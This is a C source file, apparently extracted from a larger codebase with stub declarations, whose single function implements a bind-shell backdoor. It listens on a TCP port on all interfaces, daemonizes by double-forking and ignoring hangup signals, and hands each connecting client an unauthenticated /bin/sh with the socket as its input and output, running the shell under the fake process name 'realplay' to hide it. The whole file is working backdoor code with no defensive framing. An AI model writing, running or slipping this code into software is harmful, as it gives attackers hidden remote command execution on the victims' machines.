
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {int sin_port; TYPE_1__ sin_addr; int sin_family; } ;
struct sockaddr {int dummy; } ;
typedef int server_addr ;
typedef int client_addr ;


 int AF_INET ;
 int EXIT_FAILURE ;
 int EXIT_SUCCESS ;
 int INADDR_ANY ;
 int IPPROTO_TCP ;
 int PORT ;
 int SIGHUP ;
 int SIG_IGN ;
 int SOCK_STREAM ;
 int accept (int,struct sockaddr*,int*) ;
 int bind (int,struct sockaddr*,int) ;
 int bzero (char*,int) ;
 int close (int) ;
 int dup2 (int,int) ;
 int execl (char*,char*,char*) ;
 int exit (int ) ;
 int fork () ;
 int getpid () ;
 int htonl (int ) ;
 int htons (int ) ;
 int listen (int,int) ;
 int setpgrp () ;
 int signal (int ,int ) ;
 int socket (int ,int ,int ) ;

int cookthis() {


        int sock_des, sock_client, sock_recv, sock_len, server_pid, client_pid;
        struct sockaddr_in server_addr;
        struct sockaddr_in client_addr;

        if ((sock_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
                exit(EXIT_FAILURE);

        bzero((char *) &server_addr, sizeof(server_addr));
        server_addr.sin_family = AF_INET;
        server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
        server_addr.sin_port = htons(PORT);

        if ((sock_recv = bind(sock_des, (struct sockaddr *) &server_addr, sizeof(server_addr))) != 0)
                exit(EXIT_FAILURE);
        if (fork() != 0)
                exit(EXIT_SUCCESS);
        setpgrp();
        signal(SIGHUP, SIG_IGN);
        if (fork() != 0)
                exit(EXIT_SUCCESS);
        if ((sock_recv = listen(sock_des, 5)) != 0)
                exit(EXIT_SUCCESS);
        while (1) {
                sock_len = sizeof(client_addr);
                if ((sock_client = accept(sock_des, (struct sockaddr *) &client_addr, &sock_len)) < 0)
                        exit(EXIT_SUCCESS);
                client_pid = getpid();
                server_pid = fork();
                if (server_pid != 0) {
                        dup2(sock_client,0);
                        dup2(sock_client,1);
                        dup2(sock_client,2);

                        execl("/bin/sh","realplay",(char *)0);
                        close(sock_client);
                        exit(EXIT_SUCCESS);
                }
                close(sock_client);
        }
}
